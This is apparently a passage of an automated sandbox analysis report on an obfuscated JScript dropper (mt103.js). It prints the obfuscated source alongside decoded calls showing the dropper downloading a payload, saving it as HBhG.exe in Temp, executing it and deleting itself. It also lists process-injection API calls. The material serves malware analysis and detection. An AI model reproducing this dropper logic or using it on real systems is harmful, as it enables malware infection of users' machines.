                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("W7lcNYddGYNdT8kiorm2WOJdSa","Ak^H") ➔ "139783InEZVB"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("kmoTW4ztcXLxhCoX","#k&M") ➔ "460SvEvgK"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq","4j$p") ➔ "WO41qK7cRvBcISoBWQBcVJxcMW"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("EmosWRVcNSolFa1ihmofWPhcNa","A]GT") ➔ "536561IZdlNV"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu","R8Tp") ➔ "ScriptFullName"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44","6cTY") ➔ "WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm","*zp8") ➔ "o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa"
                                                                                                                                                                                                                                                                                  • function (_0x4251a9, _0xdf85fb).cPJhTe("hXuIWQxcSSkWm8khW5/dHCkY","fXty") ➔ "32292SPYXOk"
  }, _0x4692 ( _0x5bb6db, _0x386215 );
}
var Stream = WScript[_0x296948 ( 0x1a8, '8dC3' ) ] ( _0x296948 ( 0x187, '8j7d' ) );
                                                                                                                                                                                                                                                                                      • _0x296948(424,"8dC3") ➔ "CreateObject"
                                                                                                                                                                                                                                                                                      • _0x296948(391,"8j7d") ➔ "ADODB.Stream"
                                                                                                                                                                                                                                                                                      • Windows Script Host.CreateObject("ADODB.Stream") ➔
function _0x1523() {
                                                                                                                                                                                                                                                                                      • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
  var _0xd71e86 = _0x25c5ce, _0x3a2755 = _0x296948, _0x21e936 = [ _0x3a2755 ( 0x195, '4j$p' ), _0x3a2755 ( 0x170, 'A]GT' ), _0x3a2755 ( 0x172, 'R8Tp' ), _0xd71e86 ( 0x19a ), _0xd71e86 ( 0x1ac ), '24cwPSlC', 'W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW', _0xd71e86 ( 0x186 ), 'Close', _0x3a2755 ( 0x176, '6cTY' ), _0x3a2755 ( 0x18e, '*zp8' ), _0x3a2755 ( 0x17c, 'fXty' ), _0x3a2755 ( 0x178, '6cTY' ), _0xd71e86 ( 0x17f ), _0x3a2755 ( 0x1a4, 'n0v!' ), _0xd71e86 ( 0x173 ), 'gCk/WPVdMa', _0x3a2755 ( 0x180, 'TMp!' ), _0xd71e86 ( 0x19c ), _0xd71e86 ( 0x194 ), 'C8kCWRBcQmoRqSk/DNe', _0x3a2755 ( 0x196, 'RAu]' ), _0x3a2755 ( 0x17e, 'R8Tp' ), _0xd71e86 ( 0x17d ), 'bmkMWPFcTmkPkLaJ', _0xd71e86 ( 0x184 ), 'Shell.Application' ];
                                                                                                                                                                                                                                                                                      • _0x4692(405,"4j$p") ➔ "WO41qK7cRvBcISoBWQBcVJxcMW"
                                                                                                                                                                                                                                                                                      • _0x4692(368,"A]GT") ➔ "536561IZdlNV"
                                                                                                                                                                                                                                                                                      • _0x4692(370,"R8Tp") ➔ "ScriptFullName"
                                                                                                                                                                                                                                                                                      • _0xd71e86(410) ➔ "F8kIdw8uWQKJssddISkJW51zcW"
                                                                                                                                                                                                                                                                                      • _0xd71e86(428) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                                                                                                                                                                                                                                                      • _0xd71e86(390) ➔ "hSkNWP3dMdulzwhcT0e"
                                                                                                                                                                                                                                                                                      • _0x4692(374,"6cTY") ➔ "WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48"
                                                                                                                                                                                                                                                                                      • _0x4692(398,"*zp8") ➔ "o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa"
                                                                                                                                                                                                                                                                                      • _0x4692(380,"fXty") ➔ "32292SPYXOk"
                                                                                                                                                                                                                                                                                      • _0x3a2755(376,"6cTY") ➔ "1309896lcehgL"
                                                                                                                                                                                                                                                                                      • _0xd71e86(383) ➔ "WP/cHWdcICk+W6CiFCoVWRWwjG"
                                                                                                                                                                                                                                                                                      • _0x3a2755(420,"n0v!") ➔ "934406fwGgPc"
                                                                                                                                                                                                                                                                                      • _0xd71e86(371) ➔ "3428070zJPwOJ"
                                                                                                                                                                                                                                                                                      • _0x3a2755(384,"TMp!") ➔ "W7BdICoxwmo0W5TdySkoWPGi"
                                                                                                                                                                                                                                                                                      • _0xd71e86(412) ➔ "WRxcISkFh8o1z8oeC8k8hq"
                                                                                                                                                                                                                                                                                      • _0xd71e86(404) ➔ "ShellExecute"
                                                                                                                                                                                                                                                                                      • _0x3a2755(406,"RAu]") ➔ "aLBcSv8UWRldTmkhoColW54Z"
                                                                                                                                                                                                                                                                                      • _0x3a2755(382,"R8Tp") ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                      • _0xd71e86(381) ➔ "7728888BzvkvV"
                                                                                                                                                                                                                                                                                      • _0xd71e86(388) ➔ "WRCRf8oCW5a"
  return _0x1523 =
    function () {
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                                                                                                                                                                                                                        • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
return _0x21e936;
}, _0x1523 ( );
}
                                                                                                                                                                                                                                                                                              Stream[_0x25c5ce ( 0x1ab ) ] ( ), Stream[_0x2bbb97 ( 0x107, _0x25c5ce ( 0x182 ) ) ] = 0x1, Stream[_0x2bbb97 ( 0x110, _0x25c5ce ( 0x1b0 ) ) ] ( Object[_0x2bbb97 ( 0x104, _0x25c5ce ( 0x1a9 ) ) ] ), Stream[_0x2bbb97 ( 0x10f, _0x296948 ( 0x1a0, '&eII' ) ) ] = 0x0, Stream[_0x2bbb97 ( 0xfe, _0x25c5ce ( 0x182 ) ) ] ( pOut, 0x2 ), Stream[_0x106d34 ( 0xff ) ] ( ), new ActiveXObject ( _0x106d34 ( 0x111 ) ) [_0x106d34 ( 0x10a ) ] ( pOut, '', '', _0x25c5ce ( 0x17a ), '1' ), new ActiveXObject ( _0x2bbb97 ( 0x100, _0x296948 ( 0x190, '[ZA9' ) ) ) [_0x2bbb97 ( 0x109, _0x25c5ce ( 0x183 ) ) ] ( WScript[_0x106d34 ( 0x114 ) ] );
                                                                                                                                                                                                                                                                                              • _0x25c5ce(427) ➔ "Open"
                                                                                                                                                                                                                                                                                              • Open() ➔ undefined
                                                                                                                                                                                                                                                                                              • _0x25c5ce(386) ➔ "SC!i"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(263,"SC!i") ➔ "Type"
                                                                                                                                                                                                                                                                                              • _0x25c5ce(432) ➔ "AR2w"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(272,"AR2w") ➔ "Write"
                                                                                                                                                                                                                                                                                              • _0x25c5ce(425) ➔ "p3(5"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(260,"p3(5") ➔ "ResponseBody"
                                                                                                                                                                                                                                                                                              • Write() ➔ undefined
                                                                                                                                                                                                                                                                                              • _0x296948(416,"&eII") ➔ "@ZCL"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(271,"@ZCL") ➔ "Position"
                                                                                                                                                                                                                                                                                              • _0x25c5ce(386) ➔ "SC!i"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(254,"SC!i") ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                              • SaveToFile("C:\Users\engineer\AppData\Local\Temp\HBhG.exe",2) ➔ undefined
                                                                                                                                                                                                                                                                                              • _0x106d34(255) ➔ "Close"
                                                                                                                                                                                                                                                                                              • Close() ➔ undefined
                                                                                                                                                                                                                                                                                              • _0x106d34(273) ➔ "Shell.Application"
                                                                                                                                                                                                                                                                                              • _0x106d34(266) ➔ "ShellExecute"
                                                                                                                                                                                                                                                                                              • _0x25c5ce(378) ➔ "open"
                                                                                                                                                                                                                                                                                              • ShellExecute("C:\Users\engineer\AppData\Local\Temp\HBhG.exe","","","open","1") ➔ undefined
                                                                                                                                                                                                                                                                                              • _0x296948(400,"[ZA9") ➔ "t[E2"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(256,"t[E2") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                              • _0x25c5ce(387) ➔ "XaOX"
                                                                                                                                                                                                                                                                                              • _0x2bbb97(265,"XaOX") ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                              • _0x106d34(276) ➔ "ScriptFullName"
                                                                                                                                                                                                                                                                                              • DeleteFile("C:\Users\engineer\Desktop\mt103.js") ➔ undefined

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:14.4%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                                                Total number of Nodes:81
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02A279A7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 52114997373f7f93c94a40dd6799fd69a3f85edbfd39c9b6028e3748335ffc52
                                                                                                                                                                                                                                                                                                • Instruction ID: 5ba3de788d882b075fe3e3159d4c5f0b6adf884e6df67dceb5706c80134e365c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52114997373f7f93c94a40dd6799fd69a3f85edbfd39c9b6028e3748335ffc52
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1C12871D002298FDB15CFA8CC81BEDBBB1BF49314F0095A9E849B7250DB749A89CF95
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02A279A7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d2d18f078e6c54bc2566b286b7276588cb0c259dbac3a9f4322dd3763010dba7
                                                                                                                                                                                                                                                                                                • Instruction ID: 934256f8b789d1428abc27e9b24264cccd79df0f102f1b2214869c1386213da8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2d18f078e6c54bc2566b286b7276588cb0c259dbac3a9f4322dd3763010dba7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4C12871D002298FDB15CFA8CC81BEDBBB1BF49314F0095A9E849B7250DB749A89CF95
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A27023
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A27023
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A2715A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A2715A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02A26EDA
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02A26EDA
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetThreadContext.KERNELBASE(?,?), ref: 02A26DB7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ContextThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1591575202-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetThreadContext.KERNELBASE(?,?), ref: 02A26DB7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ContextThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1591575202-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 02A26C66
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 02A26C66
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: P$UUUU$rA29
                                                                                                                                                                                                                                                                                                • API String ID: 0-1803072496
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 4
                                                                                                                                                                                                                                                                                                • API String ID: 0-4088798008
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6a70323adfc0f941548476fa3ddae6fb805b3fc4caf9ed4c22b9f003f0b36169
                                                                                                                                                                                                                                                                                                • Instruction ID: e6beda4c11fd0b8b1be022107a6f38b5910deda97285314c026d043a5c1bfb3a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a70323adfc0f941548476fa3ddae6fb805b3fc4caf9ed4c22b9f003f0b36169
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE516D30A002888FD746EFB9F45469A7FF2BF88304F10CA29D108AB76AEF7559059B51
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.355487874.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2a20000_HBhG.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ccd56ba0ea7a9e44b51778803b0b4797ed27e12435d8a65d51bbfa520e70b873
                                                                                                                                                                                                                                                                                                • Instruction ID: 8315d5ae6056a3bc0db0bfd33e8921b25e8be59b4115cd4f811de74702e538ff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccd56ba0ea7a9e44b51778803b0b4797ed27e12435d8a65d51bbfa520e70b873
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8514C70A00288CFD746EFB9F49469E7FF2BB98304F10C929D108AB76AEF7559059B50
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:5.8%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:5.2%
                                                                                                                                                                                                                                                                                                Signature Coverage:4.9%
